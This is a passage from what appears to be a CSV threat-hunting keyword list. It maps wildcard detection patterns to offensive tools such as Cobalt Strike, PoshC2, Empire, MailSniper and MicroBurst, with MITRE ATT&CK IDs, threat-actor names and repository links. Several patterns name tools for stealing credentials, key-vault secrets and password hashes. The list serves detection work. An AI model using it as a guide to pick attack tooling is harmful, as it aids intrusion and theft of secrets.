HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*get_obfucation_string_dict*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,0,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*get_password_policy.x64.*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z -*get_password_policy.x86.*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z -*get_post_ex_pipename_list*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*get_post_ex_spawnto_x*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*get_process_inject_allocator*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*get_process_inject_bof_allocator*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*get_process_inject_execute*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*get_rooot.c*,offensive_tool_keyword,POC,Exploit for CVE-2022-27666,T1550 - T1555 - T1212 - T1558,TA0005,N/A,N/A,Exploitation tools,https://github.com/plummm/CVE-2022-27666,1,1,N/A,N/A,3,203,41,2022-03-28T18:21:00Z,2022-03-23T22:54:28Z -*get_sharpurls*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*get_stage_allocator*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*get_stage_magic_mz_64*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*get_stage_magic_mz_86*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*get_stage_magic_pe*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*get_virtual_Hook_address*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*Get_WinPwn_Repo.sh*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Get-AccessTokenWithPRT*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Get-AclModificationRights*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Get-ActiveTCPConnections*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Start-MonitorTCPConnections.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-ADComputer * -Properties PrincipalsAllowedToDelegateToAccount*,offensive_tool_keyword,powershell,Command to get the list of accounts with PrincipalsAllowedToDelegateToAccount (used to exploit Bronze Bit Attack),T1003 - T1057 - T1087 - T1482 - T1136,TA0001 - TA0002 - TA0005 - TA0006 - TA0008,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Get-ADUsernameFromEWS*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*GetADUsers.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*getAggressorClient*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*getAllUserSpns*,offensive_tool_keyword,ldapdomaindump,Active Directory information dumper via LDAP,T1087 - T1005 - T1016,TA0007,N/A,N/A,Credential Access,https://github.com/dirkjanm/ldapdomaindump,1,1,N/A,N/A,10,970,176,2023-09-06T05:50:30Z,2016-05-24T18:46:56Z -*Get-AppLockerPolicy -Effective *,greyware_tool_keyword,powershell,AppLocker Get AppLocker policy,T1592,TA0043,N/A,N/A,Reconnaissance,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*Get-ASREPHash*,offensive_tool_keyword,AD exploitation cheat sheet,AS-REP roasting Get the hash for a roastable user using ASREPRoast.ps1,T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Get-AzAutomationAccountCredsREST.ps1*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Get-AzDomainInfo*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Get-AzDomainInfoREST.ps1*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Get-AzKeyVaultKeysREST.ps1*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Get-AzKeyVaultSecretsREST.ps1*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Get-AzPasswords*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Get-AZStorageKeysREST.ps1*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Get-AzureADDomainInfo*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Get-AzureADDomainInfo.ps1*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Get-AzurePasswords*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Get-AzUserAssignedIdentity*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Get-BaseLineResponseTimeEAS*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Get-BeaconAPI*,offensive_tool_keyword,cobaltstrike,Load any Beacon Object File using Powershell!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 